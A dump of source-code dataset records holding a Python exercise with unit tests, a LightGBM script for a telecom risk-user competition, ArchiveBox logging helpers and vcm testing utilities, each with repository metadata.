Purpose: Exception types used by getline
'''
class GetlineException(Exception):
    """Base exception raised by the getline library."""
| 0 | 18 | 23 |
55d9072e4d504f55d90ff8e9c73484fcf9c7cdd6 | 528 | py | Python | 01-python-refresher/problems/05-first-negative-index.py | estimand/python-for-data-science | 90178784eb40936054d53f4ebbb67b2cf7fd4087 | [
"CC-BY-4.0"
] | null | null | null | 01-python-refresher/problems/05-first-negative-index.py | estimand/python-for-data-science | 90178784eb40936054d53f4ebbb67b2cf7fd4087 | [
"CC-BY-4.0"
] | null | null | null | 01-python-refresher/problems/05-first-negative-index.py | estimand/python-for-data-science | 90178784eb40936054d53f4ebbb67b2cf7fd4087 | [
"CC-BY-4.0"
] | 4 | 2019-03-05T17:53:30.000Z | 2019-06-26T11:48:57.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
def first_negative_index(numbers=()):
    """
    Returns the index of the first negative element in a given list of numbers.

    Args:
        numbers: a sequence of numbers (defaults to an empty sequence, so the
            original zero-argument call still works and yields None).

    Returns:
        The zero-based index of the first element strictly less than zero,
        or None when the sequence is empty or contains no negative number.
    """
    # Fix: the original stub accepted no argument and always returned None,
    # so the accompanying unit tests (which pass a list) raised TypeError.
    for index, number in enumerate(numbers):
        if number < 0:
            return index
    return None
if __name__ == "__main__":
unittest.main()
| 22.956522 | 79 | 0.668561 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import unittest
def first_negative_index(numbers=()):
    """
    Returns the index of the first negative element in a given list of numbers.

    Args:
        numbers: a sequence of numbers (defaults to an empty sequence, so the
            original zero-argument call still works and yields None).

    Returns:
        The zero-based index of the first element strictly less than zero,
        or None when the sequence is empty or contains no negative number.
    """
    # Fix: the original stub accepted no argument and always returned None,
    # so the unit tests below (which pass a list) raised TypeError.
    for index, number in enumerate(numbers):
        if number < 0:
            return index
    return None
class TestFirstNegativeIndex(unittest.TestCase):
    """Unit tests for first_negative_index()."""

    def test_first_negative_index(self):
        # Each case pairs an input list with the expected result (None when
        # the list is empty or holds no negative number).
        cases = [
            ([], None),
            ([1, 3, 5, 7, 9], None),
            ([1, 3, -5, 7, -9], 2),
        ]
        for numbers, expected in cases:
            self.assertEqual(first_negative_index(numbers), expected)
if __name__ == "__main__":
unittest.main()
| 201 | 27 | 49 |
69396c6f63e0123dbeff5f668a09d4d0ec0ad2c8 | 9,832 | py | Python | src/main.py | autowonderman/2018-JData-Unicom-RiskUser | 6ea5d3179aa8ea1a89e9b8fa7e74ce9c9cac4302 | [
"MIT"
] | 20 | 2018-05-23T08:39:16.000Z | 2021-02-20T04:14:06.000Z | src/main.py | wujx0213/2018-JData-Unicom-RiskUser | 6ea5d3179aa8ea1a89e9b8fa7e74ce9c9cac4302 | [
"MIT"
] | null | null | null | src/main.py | wujx0213/2018-JData-Unicom-RiskUser | 6ea5d3179aa8ea1a89e9b8fa7e74ce9c9cac4302 | [
"MIT"
] | 17 | 2018-05-23T07:28:22.000Z | 2019-03-20T09:18:28.000Z | # coding: utf-8
from __future__ import division
import numpy as np
import pandas as pd
from sklearn import metrics
import lightgbm as lgb
import time
from multiprocessing import cpu_count
import warnings
warnings.filterwarnings('ignore')
# Constants define
ROOT_PATH = '../'
ONLINE = 1
target = 'label'
train_len = 4999
threshold = 0.5
########################################### Helper function ###########################################
########################################### Read data ###########################################
train = pd.read_csv(ROOT_PATH + 'data/input/train/uid_train.txt', header=None, sep='\t')
train.columns = ['uid', 'label']
train_voice = pd.read_csv(ROOT_PATH + 'data/input/train/voice_train.txt', header=None, sep='\t')
train_voice.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'end_time', 'call_type', 'in_out']
train_sms = pd.read_csv(ROOT_PATH + 'data/input/train/sms_train.txt', header=None, sep='\t')
train_sms.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'in_out']
train_wa = pd.read_csv(ROOT_PATH + 'data/input/train/wa_train.txt', header=None, sep='\t')
train_wa.columns = ['uid', 'wa_name', 'visit_cnt', 'visit_dura', 'up_flow', 'down_flow', 'wa_type', 'date']
test = pd.DataFrame({'uid': ['u' + str(i) for i in range(5000, 7000)]})
test_voice = pd.read_csv(ROOT_PATH + 'data/input/test_a/voice_test_a.txt', header=None, sep='\t')
test_voice.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'end_time', 'call_type', 'in_out']
test_sms = pd.read_csv(ROOT_PATH + 'data/input/test_a/sms_test_a.txt', header=None, sep='\t')
test_sms.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'in_out']
test_wa = pd.read_csv(ROOT_PATH + 'data/input/test_a/wa_test_a.txt', header=None, sep='\t')
test_wa.columns = ['uid', 'wa_name', 'visit_cnt', 'visit_dura', 'up_flow', 'down_flow', 'wa_type', 'date']
df = pd.concat([train, test]).reset_index(drop=True)
df_voice = pd.concat([train_voice, test_voice]).reset_index(drop=True)
df_sms = pd.concat([train_sms, test_sms]).reset_index(drop=True)
df_wa = pd.concat([train_wa, test_wa]).reset_index(drop=True)
########################################### Feature engineer ###########################################
predictors = []
df, predictors_tmp = merge_feat_count(df, df_voice, ['uid'], 'count_gb_uid_in_voice'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_count(df, df_sms, ['uid'], 'count_gb_uid_in_sms'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_count(df, df_wa, ['uid'], 'count_gb_uid_in_wa'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'opp_len'], 'voice_opp_len'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'call_type'], 'voice_call_type'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'in_out'], 'voice_in_out_'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_sms, ['uid', 'opp_len'], 'sms_opp_len'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_sms, ['uid', 'in_out'], 'sms_in_out'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_wa, ['uid', 'wa_type'], 'wa_type'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_wa, ['uid', 'date'], 'wa_date'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_voice, ['uid'], 'opp_num', 'nunique_oppNum_gb_uid_in_voice'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_voice, ['uid'], 'opp_head', 'nunique_oppHead_gb_uid_in_voice'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_sms, ['uid'], 'opp_num', 'nunique_oppNum_gb_uid_in_sms'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_sms, ['uid'], 'opp_head', 'nunique_oppHead_gb_uid_in_sms'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_wa, ['uid'], 'wa_name', 'nunique_waName_gb_uid_in_wa'); predictors += predictors_tmp
col_list = ['visit_cnt', 'visit_dura', 'up_flow', 'down_flow']
for i in col_list:
df, predictors_tmp = merge_feat_min(df, df_wa, ['uid'], i, 'min_%s_gb_uid_in_wa' % i); predictors += predictors_tmp
df, predictors_tmp = merge_feat_max(df, df_wa, ['uid'], i, 'max_%s_gb_uid_in_wa' % i); predictors += predictors_tmp
df, predictors_tmp = merge_feat_mean(df, df_wa, ['uid'], i, 'mean_%s_gb_uid_in_wa' % i); predictors += predictors_tmp
train_x = df.loc[:(train_len - 1), predictors]
train_y = df.loc[:(train_len - 1), target]
test_x = df.loc[train_len:, predictors]
########################################### LightGBM ###########################################
config_lgb = {
'rounds': 10000,
'folds': 5
}
params_lgb = {
'boosting_type': 'gbdt',
'objective': 'binary',
'metric': {'auc'},
'num_leaves': 63,
'learning_rate': 0.06,
'feature_fraction': 0.8,
'bagging_fraction': 0.8,
'bagging_freq': 1,
# 'min_sum_hessian_in_leaf': 10,
'verbosity': 5,
'num_threads': cpu_count() - 1,
'seed': 7,
}
# lgb_cv(train_x, train_y, params_lgb, config_lgb['rounds'], config_lgb['folds'])
model_lgb, pred_lgb = lgb_train_predict(train_x, train_y, test_x, params_lgb, 90)
result = store_result(test.uid, pred_lgb, threshold, '20180523-lgb-%d-%d(r%d)' % (7742, 9098, 90))
result = store_result(test.uid, pred_lgb, threshold, 'submission')
imp = pd.DataFrame({'feature':train_x.columns.values, 'importance':list(model_lgb.feature_importance())})
imp = imp.sort_values(by = 'importance', ascending = False)
imp.to_csv(ROOT_PATH + 'data/output/feat_imp/imp-20180523-%d-%d(r%d).csv' % (7700, 9102, 90), index=False)
| 49.908629 | 139 | 0.682465 | # coding: utf-8
from __future__ import division
import numpy as np
import pandas as pd
from sklearn import metrics
import lightgbm as lgb
import time
from multiprocessing import cpu_count
import warnings
warnings.filterwarnings('ignore')
# Constants define
ROOT_PATH = '../'
ONLINE = 1
target = 'label'
train_len = 4999
threshold = 0.5
########################################### Helper function ###########################################
def log(info):
print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) + ' ' + str(info))
def merge_feat_count(df, df_feat, columns_groupby, new_column_name, type='int'):
df_count = pd.DataFrame(df_feat.groupby(columns_groupby).size()).fillna(0).astype(type).reset_index()
df_count.columns = columns_groupby + [new_column_name]
df = df.merge(df_count, on=columns_groupby, how='left')
return df, [new_column_name]
def merge_feat_onehot_count(df, df_feat, columns_groupby, prefix, type='int'):
df_count = df_feat.groupby(columns_groupby).size().unstack().fillna(0).astype(type).reset_index()
df_count.columns = [i if i == columns_groupby[0] else prefix + '_' + str(i) for i in df_count.columns]
df = df.merge(df_count, on=columns_groupby[0], how='left')
return df, list(np.delete(df_count.columns.values, 0))
def merge_feat_nunique(df, df_feat, columns_groupby, column, new_column_name, type='int'):
df_nunique = pd.DataFrame(df_feat.groupby(columns_groupby)[column].nunique()).fillna(0).astype(type).reset_index()
df_nunique.columns = columns_groupby + [new_column_name]
df = df.merge(df_nunique, on=columns_groupby, how='left')
return df, [new_column_name]
def merge_feat_min(df, df_feat, columns_groupby, column, new_column_name, type='float'):
df_min = pd.DataFrame(df_feat.groupby(columns_groupby)[column].min()).fillna(0).astype(type).reset_index()
df_min.columns = columns_groupby + [new_column_name]
df = df.merge(df_min, on=columns_groupby, how='left')
return df, [new_column_name]
def merge_feat_max(df, df_feat, columns_groupby, column, new_column_name, type='float'):
df_max = pd.DataFrame(df_feat.groupby(columns_groupby)[column].max()).fillna(0).astype(type).reset_index()
df_max.columns = columns_groupby + [new_column_name]
df = df.merge(df_max, on=columns_groupby, how='left')
return df, [new_column_name]
def merge_feat_mean(df, df_feat, columns_groupby, column, new_column_name, type='float'):
df_mean = pd.DataFrame(df_feat.groupby(columns_groupby)[column].mean()).fillna(0).astype(type).reset_index()
df_mean.columns = columns_groupby + [new_column_name]
df = df.merge(df_mean, on=columns_groupby, how='left')
return df, [new_column_name]
def eval_auc_f1(preds, dtrain):
df = pd.DataFrame({'y_true': dtrain.get_label(), 'y_score': preds})
df['y_pred'] = df['y_score'].apply(lambda x: 1 if x >= threshold else 0)
auc = metrics.roc_auc_score(df.y_true, df.y_score)
f1 = metrics.f1_score(df.y_true, df.y_pred)
return 'feval', (auc * 0.6 + f1 * 0.4), True
def lgb_cv(train_x, train_y, params, rounds, folds):
start = time.clock()
log(str(train_x.columns))
dtrain = lgb.Dataset(train_x, label=train_y)
log('run cv: ' + 'round: ' + str(rounds))
res = lgb.cv(params, dtrain, rounds, nfold=folds,
metrics=['eval_auc_f1', 'auc'], feval=eval_auc_f1,
early_stopping_rounds=200, verbose_eval=5)
elapsed = (time.clock() - start)
log('Time used:' + str(elapsed) + 's')
return len(res['feval-mean']), res['feval-mean'][len(res['feval-mean']) - 1], res['auc-mean'][len(res['auc-mean']) - 1]
def lgb_train_predict(train_x, train_y, test_x, params, rounds):
start = time.clock()
log(str(train_x.columns))
dtrain = lgb.Dataset(train_x, label=train_y)
valid_sets = [dtrain]
model = lgb.train(params, dtrain, rounds, valid_sets, feval=eval_auc_f1, verbose_eval=5)
pred = model.predict(test_x)
elapsed = (time.clock() - start)
log('Time used:' + str(elapsed) + 's')
return model, pred
def store_result(test_index, pred, threshold, name):
result = pd.DataFrame({'uid': test_index, 'prob': pred})
result = result.sort_values('prob', ascending=False)
result['label'] = 0
result.loc[result.prob > threshold, 'label'] = 1
result.to_csv('../data/output/sub/' + name + '.csv', index=0, header=0, columns=['uid', 'label'])
return result
########################################### Read data ###########################################
train = pd.read_csv(ROOT_PATH + 'data/input/train/uid_train.txt', header=None, sep='\t')
train.columns = ['uid', 'label']
train_voice = pd.read_csv(ROOT_PATH + 'data/input/train/voice_train.txt', header=None, sep='\t')
train_voice.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'end_time', 'call_type', 'in_out']
train_sms = pd.read_csv(ROOT_PATH + 'data/input/train/sms_train.txt', header=None, sep='\t')
train_sms.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'in_out']
train_wa = pd.read_csv(ROOT_PATH + 'data/input/train/wa_train.txt', header=None, sep='\t')
train_wa.columns = ['uid', 'wa_name', 'visit_cnt', 'visit_dura', 'up_flow', 'down_flow', 'wa_type', 'date']
test = pd.DataFrame({'uid': ['u' + str(i) for i in range(5000, 7000)]})
test_voice = pd.read_csv(ROOT_PATH + 'data/input/test_a/voice_test_a.txt', header=None, sep='\t')
test_voice.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'end_time', 'call_type', 'in_out']
test_sms = pd.read_csv(ROOT_PATH + 'data/input/test_a/sms_test_a.txt', header=None, sep='\t')
test_sms.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'in_out']
test_wa = pd.read_csv(ROOT_PATH + 'data/input/test_a/wa_test_a.txt', header=None, sep='\t')
test_wa.columns = ['uid', 'wa_name', 'visit_cnt', 'visit_dura', 'up_flow', 'down_flow', 'wa_type', 'date']
df = pd.concat([train, test]).reset_index(drop=True)
df_voice = pd.concat([train_voice, test_voice]).reset_index(drop=True)
df_sms = pd.concat([train_sms, test_sms]).reset_index(drop=True)
df_wa = pd.concat([train_wa, test_wa]).reset_index(drop=True)
########################################### Feature engineer ###########################################
predictors = []
df, predictors_tmp = merge_feat_count(df, df_voice, ['uid'], 'count_gb_uid_in_voice'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_count(df, df_sms, ['uid'], 'count_gb_uid_in_sms'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_count(df, df_wa, ['uid'], 'count_gb_uid_in_wa'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'opp_len'], 'voice_opp_len'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'call_type'], 'voice_call_type'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'in_out'], 'voice_in_out_'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_sms, ['uid', 'opp_len'], 'sms_opp_len'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_sms, ['uid', 'in_out'], 'sms_in_out'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_wa, ['uid', 'wa_type'], 'wa_type'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_onehot_count(df, df_wa, ['uid', 'date'], 'wa_date'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_voice, ['uid'], 'opp_num', 'nunique_oppNum_gb_uid_in_voice'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_voice, ['uid'], 'opp_head', 'nunique_oppHead_gb_uid_in_voice'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_sms, ['uid'], 'opp_num', 'nunique_oppNum_gb_uid_in_sms'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_sms, ['uid'], 'opp_head', 'nunique_oppHead_gb_uid_in_sms'); predictors += predictors_tmp
df, predictors_tmp = merge_feat_nunique(df, df_wa, ['uid'], 'wa_name', 'nunique_waName_gb_uid_in_wa'); predictors += predictors_tmp
col_list = ['visit_cnt', 'visit_dura', 'up_flow', 'down_flow']
for i in col_list:
df, predictors_tmp = merge_feat_min(df, df_wa, ['uid'], i, 'min_%s_gb_uid_in_wa' % i); predictors += predictors_tmp
df, predictors_tmp = merge_feat_max(df, df_wa, ['uid'], i, 'max_%s_gb_uid_in_wa' % i); predictors += predictors_tmp
df, predictors_tmp = merge_feat_mean(df, df_wa, ['uid'], i, 'mean_%s_gb_uid_in_wa' % i); predictors += predictors_tmp
train_x = df.loc[:(train_len - 1), predictors]
train_y = df.loc[:(train_len - 1), target]
test_x = df.loc[train_len:, predictors]
########################################### LightGBM ###########################################
config_lgb = {
'rounds': 10000,
'folds': 5
}
params_lgb = {
'boosting_type': 'gbdt',
'objective': 'binary',
'metric': {'auc'},
'num_leaves': 63,
'learning_rate': 0.06,
'feature_fraction': 0.8,
'bagging_fraction': 0.8,
'bagging_freq': 1,
# 'min_sum_hessian_in_leaf': 10,
'verbosity': 5,
'num_threads': cpu_count() - 1,
'seed': 7,
}
# lgb_cv(train_x, train_y, params_lgb, config_lgb['rounds'], config_lgb['folds'])
model_lgb, pred_lgb = lgb_train_predict(train_x, train_y, test_x, params_lgb, 90)
result = store_result(test.uid, pred_lgb, threshold, '20180523-lgb-%d-%d(r%d)' % (7742, 9098, 90))
result = store_result(test.uid, pred_lgb, threshold, 'submission')
imp = pd.DataFrame({'feature':train_x.columns.values, 'importance':list(model_lgb.feature_importance())})
imp = imp.sort_values(by = 'importance', ascending = False)
imp.to_csv(ROOT_PATH + 'data/output/feat_imp/imp-20180523-%d-%d(r%d).csv' % (7700, 9102, 90), index=False)
| 3,735 | 0 | 253 |
4dc2c05150b71590453542cfcd0e517e57e240e9 | 6,578 | py | Python | archivebox/logs.py | backwardn/ArchiveBox | 10799e4085b6f0c791135c3df06675618e34aa78 | [
"MIT"
] | 2 | 2019-10-17T00:42:41.000Z | 2020-11-05T22:41:22.000Z | archivebox/logs.py | backwardn/ArchiveBox | 10799e4085b6f0c791135c3df06675618e34aa78 | [
"MIT"
] | 59 | 2019-09-25T06:15:31.000Z | 2021-07-21T05:29:52.000Z | archivebox/logs.py | backwardn/ArchiveBox | 10799e4085b6f0c791135c3df06675618e34aa78 | [
"MIT"
] | 1 | 2019-10-22T19:23:21.000Z | 2019-10-22T19:23:21.000Z | import sys
from datetime import datetime
from config import ANSI, REPO_DIR, OUTPUT_DIR
# globals are bad, mmkay
_LAST_RUN_STATS = {
'skipped': 0,
'succeeded': 0,
'failed': 0,
'parsing_start_ts': 0,
'parsing_end_ts': 0,
'indexing_start_ts': 0,
'indexing_end_ts': 0,
'archiving_start_ts': 0,
'archiving_end_ts': 0,
'links': {},
}
def pretty_path(path):
"""convert paths like .../ArchiveBox/archivebox/../output/abc into output/abc"""
return path.replace(REPO_DIR + '/', '')
### Parsing Stage
### Indexing Stage
### Archiving Stage
def log_archive_method_finished(result):
"""quote the argument with whitespace in a command so the user can
copy-paste the outputted string directly to run the cmd
"""
required_keys = ('cmd', 'pwd', 'output', 'status', 'start_ts', 'end_ts')
assert (
isinstance(result, dict)
and all(key in result for key in required_keys)
and ('output' in result)
), 'Archive method did not return a valid result.'
# Prettify CMD string and make it safe to copy-paste by quoting arguments
quoted_cmd = ' '.join(
'"{}"'.format(arg) if ' ' in arg else arg
for arg in result['cmd']
)
if result['status'] == 'failed':
# Prettify error output hints string and limit to five lines
hints = getattr(result['output'], 'hints', None) or ()
if hints:
hints = hints if isinstance(hints, (list, tuple)) else hints.split('\n')
hints = (
' {}{}{}'.format(ANSI['lightyellow'], line.strip(), ANSI['reset'])
for line in hints[:5] if line.strip()
)
# Collect and prefix output lines with indentation
output_lines = [
'{}Failed:{} {}{}'.format(
ANSI['red'],
result['output'].__class__.__name__.replace('ArchiveError', ''),
result['output'],
ANSI['reset']
),
*hints,
'{}Run to see full output:{}'.format(ANSI['lightred'], ANSI['reset']),
' cd {};'.format(result['pwd']),
' {}'.format(quoted_cmd),
]
print('\n'.join(
' {}'.format(line)
for line in output_lines
if line
))
| 32.564356 | 108 | 0.574187 | import sys
from datetime import datetime
from config import ANSI, REPO_DIR, OUTPUT_DIR
# globals are bad, mmkay
_LAST_RUN_STATS = {
'skipped': 0,
'succeeded': 0,
'failed': 0,
'parsing_start_ts': 0,
'parsing_end_ts': 0,
'indexing_start_ts': 0,
'indexing_end_ts': 0,
'archiving_start_ts': 0,
'archiving_end_ts': 0,
'links': {},
}
def pretty_path(path):
"""convert paths like .../ArchiveBox/archivebox/../output/abc into output/abc"""
return path.replace(REPO_DIR + '/', '')
### Parsing Stage
def log_parsing_started(source_file):
start_ts = datetime.now()
_LAST_RUN_STATS['parse_start_ts'] = start_ts
print('{green}[*] [{}] Parsing new links from output/sources/{}...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
source_file.rsplit('/', 1)[-1],
**ANSI,
))
def log_parsing_finished(num_new_links, parser_name):
print(' > Adding {} new links to index (parsed import as {})'.format(
num_new_links,
parser_name,
))
### Indexing Stage
def log_indexing_process_started():
start_ts = datetime.now()
_LAST_RUN_STATS['index_start_ts'] = start_ts
print('{green}[*] [{}] Saving main index files...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
**ANSI,
))
def log_indexing_started(out_dir, out_file):
sys.stdout.write(' > {}/{}'.format(pretty_path(out_dir), out_file))
def log_indexing_finished(out_dir, out_file):
end_ts = datetime.now()
_LAST_RUN_STATS['index_end_ts'] = end_ts
print('\r √ {}/{}'.format(pretty_path(out_dir), out_file))
### Archiving Stage
def log_archiving_started(num_links, resume):
start_ts = datetime.now()
_LAST_RUN_STATS['start_ts'] = start_ts
if resume:
print('{green}[▶] [{}] Resuming archive updating for {} pages starting from {}...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
resume,
**ANSI,
))
else:
print('{green}[▶] [{}] Updating content for {} pages in archive...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
**ANSI,
))
def log_archiving_paused(num_links, idx, timestamp):
end_ts = datetime.now()
_LAST_RUN_STATS['end_ts'] = end_ts
print()
print('\n{lightyellow}[X] [{now}] Downloading paused on link {timestamp} ({idx}/{total}){reset}'.format(
**ANSI,
now=end_ts.strftime('%Y-%m-%d %H:%M:%S'),
idx=idx+1,
timestamp=timestamp,
total=num_links,
))
print(' To view your archive, open: {}/index.html'.format(OUTPUT_DIR.replace(REPO_DIR + '/', '')))
print(' Continue where you left off by running:')
print(' {} {}'.format(
pretty_path(sys.argv[0]),
timestamp,
))
def log_archiving_finished(num_links):
end_ts = datetime.now()
_LAST_RUN_STATS['end_ts'] = end_ts
seconds = end_ts.timestamp() - _LAST_RUN_STATS['start_ts'].timestamp()
if seconds > 60:
duration = '{0:.2f} min'.format(seconds / 60, 2)
else:
duration = '{0:.2f} sec'.format(seconds, 2)
print('{}[√] [{}] Update of {} pages complete ({}){}'.format(
ANSI['green'],
end_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
duration,
ANSI['reset'],
))
print(' - {} links skipped'.format(_LAST_RUN_STATS['skipped']))
print(' - {} links updated'.format(_LAST_RUN_STATS['succeeded']))
print(' - {} links had errors'.format(_LAST_RUN_STATS['failed']))
print(' To view your archive, open: {}/index.html'.format(OUTPUT_DIR.replace(REPO_DIR + '/', '')))
def log_link_archiving_started(link_dir, link, is_new):
# [*] [2019-03-22 13:46:45] "Log Structured Merge Trees - ben stopford"
# http://www.benstopford.com/2015/02/14/log-structured-merge-trees/
# > output/archive/1478739709
print('\n[{symbol_color}{symbol}{reset}] [{symbol_color}{now}{reset}] "{title}"'.format(
symbol_color=ANSI['green' if is_new else 'black'],
symbol='+' if is_new else '*',
now=datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
title=link['title'] or link['url'],
**ANSI,
))
print(' {blue}{url}{reset}'.format(url=link['url'], **ANSI))
print(' {} {}'.format(
'>' if is_new else '√',
pretty_path(link_dir),
))
def log_link_archiving_finished(link_dir, link, is_new, stats):
total = sum(stats.values())
if stats['failed'] > 0 :
_LAST_RUN_STATS['failed'] += 1
elif stats['skipped'] == total:
_LAST_RUN_STATS['skipped'] += 1
else:
_LAST_RUN_STATS['succeeded'] += 1
def log_archive_method_started(method):
print(' > {}'.format(method))
def log_archive_method_finished(result):
"""quote the argument with whitespace in a command so the user can
copy-paste the outputted string directly to run the cmd
"""
required_keys = ('cmd', 'pwd', 'output', 'status', 'start_ts', 'end_ts')
assert (
isinstance(result, dict)
and all(key in result for key in required_keys)
and ('output' in result)
), 'Archive method did not return a valid result.'
# Prettify CMD string and make it safe to copy-paste by quoting arguments
quoted_cmd = ' '.join(
'"{}"'.format(arg) if ' ' in arg else arg
for arg in result['cmd']
)
if result['status'] == 'failed':
# Prettify error output hints string and limit to five lines
hints = getattr(result['output'], 'hints', None) or ()
if hints:
hints = hints if isinstance(hints, (list, tuple)) else hints.split('\n')
hints = (
' {}{}{}'.format(ANSI['lightyellow'], line.strip(), ANSI['reset'])
for line in hints[:5] if line.strip()
)
# Collect and prefix output lines with indentation
output_lines = [
'{}Failed:{} {}{}'.format(
ANSI['red'],
result['output'].__class__.__name__.replace('ArchiveError', ''),
result['output'],
ANSI['reset']
),
*hints,
'{}Run to see full output:{}'.format(ANSI['lightred'], ANSI['reset']),
' cd {};'.format(result['pwd']),
' {}'.format(quoted_cmd),
]
print('\n'.join(
' {}'.format(line)
for line in output_lines
if line
))
| 4,000 | 0 | 253 |
b0b4f8e45c3a89e33030d8d4505d5c8ac2abe457 | 2,054 | py | Python | external/vcm/vcm/testing.py | ai2cm/fv3net | e62038aee0a97d6207e66baabd8938467838cf51 | [
"MIT"
] | 1 | 2021-12-14T23:43:35.000Z | 2021-12-14T23:43:35.000Z | external/vcm/vcm/testing.py | ai2cm/fv3net | e62038aee0a97d6207e66baabd8938467838cf51 | [
"MIT"
] | 195 | 2021-09-16T05:47:18.000Z | 2022-03-31T22:03:15.000Z | external/vcm/vcm/testing.py | ai2cm/fv3net | e62038aee0a97d6207e66baabd8938467838cf51 | [
"MIT"
] | null | null | null | from typing import Hashable, List, Tuple, Mapping
import contextlib
import pytest
import numpy as np
import joblib
import xarray
import io
@contextlib.contextmanager
def no_warning(*args):
"""Raise error if any errors occur. Takes the same arguments as
``pytest.warns``.
Example:
>>> import warnings
>>> from vcm.testing import no_warning
>>> with no_warning(UserWarning):
... warnings.warn(UserWarning("A warning"))
...
Traceback (most recent call last):
File "<ipython-input-9-c178a20fa539>", line 2, in <module>
warnings.warn(UserWarning("A warning"))
File "/Users/noah/.pyenv/versions/miniconda3-latest/envs/fv3net/lib/python3.7/contextlib.py", line 119, in __exit__
next(self.gen)
File "/Users/noah/workspace/fv3net/external/vcm/vcm/testing.py", line 14, in no_warning
assert len(record) == 0
AssertionError
""" # noqa
with pytest.warns(*args) as record:
yield
assert len(record) == 0
def checksum_dataarray_mapping(
d: Mapping[Hashable, xarray.DataArray]
) -> List[Tuple[Hashable, str]]:
"""Checksum a mapping of datarrays
Returns:
sorted list of (key, hash) combinations. This is sorted to simplify
regression testing.
"""
sorted_keys = sorted(d.keys())
return [(key, checksum_dataarray(d[key])) for key in sorted_keys]
| 28.527778 | 123 | 0.643135 | from typing import Hashable, List, Tuple, Mapping
import contextlib
import pytest
import numpy as np
import joblib
import xarray
import io
@contextlib.contextmanager
def no_warning(*args):
"""Raise error if any errors occur. Takes the same arguments as
``pytest.warns``.
Example:
>>> import warnings
>>> from vcm.testing import no_warning
>>> with no_warning(UserWarning):
... warnings.warn(UserWarning("A warning"))
...
Traceback (most recent call last):
File "<ipython-input-9-c178a20fa539>", line 2, in <module>
warnings.warn(UserWarning("A warning"))
File "/Users/noah/.pyenv/versions/miniconda3-latest/envs/fv3net/lib/python3.7/contextlib.py", line 119, in __exit__
next(self.gen)
File "/Users/noah/workspace/fv3net/external/vcm/vcm/testing.py", line 14, in no_warning
assert len(record) == 0
AssertionError
""" # noqa
with pytest.warns(*args) as record:
yield
assert len(record) == 0
def checksum_dataarray(xobj) -> str:
return joblib.hash(np.asarray(xobj))
def checksum_dataarray_mapping(
d: Mapping[Hashable, xarray.DataArray]
) -> List[Tuple[Hashable, str]]:
"""Checksum a mapping of datarrays
Returns:
sorted list of (key, hash) combinations. This is sorted to simplify
regression testing.
"""
sorted_keys = sorted(d.keys())
return [(key, checksum_dataarray(d[key])) for key in sorted_keys]
def regression_data(
array: xarray.DataArray, attrs: bool = True, coords: bool = True
) -> str:
f = io.StringIO()
print("Array hash:", file=f)
print(checksum_dataarray(array), file=f)
if coords:
print("Coordinate info:", file=f)
for coord in array.coords:
print("Coordinate ", coord, ":", np.asarray(array[coord]), file=f)
if attrs:
print("CDL Description of Data:")
# This ensures the metadata is correct
array.to_dataset(name="a").info(f)
return f.getvalue()
| 575 | 0 | 46 |
f3c271325f8cb951926682f322a1c0dd15800adb | 142 | py | Python | Aulas/Aulas-Mundo3/Aula016/Aula016c.py | Sofista23/Aula1_Python | 129132d977058ac6f23cc95c7bb8b55d8a1bb429 | [
"MIT"
] | null | null | null | Aulas/Aulas-Mundo3/Aula016/Aula016c.py | Sofista23/Aula1_Python | 129132d977058ac6f23cc95c7bb8b55d8a1bb429 | [
"MIT"
] | null | null | null | Aulas/Aulas-Mundo3/Aula016/Aula016c.py | Sofista23/Aula1_Python | 129132d977058ac6f23cc95c7bb8b55d8a1bb429 | [
"MIT"
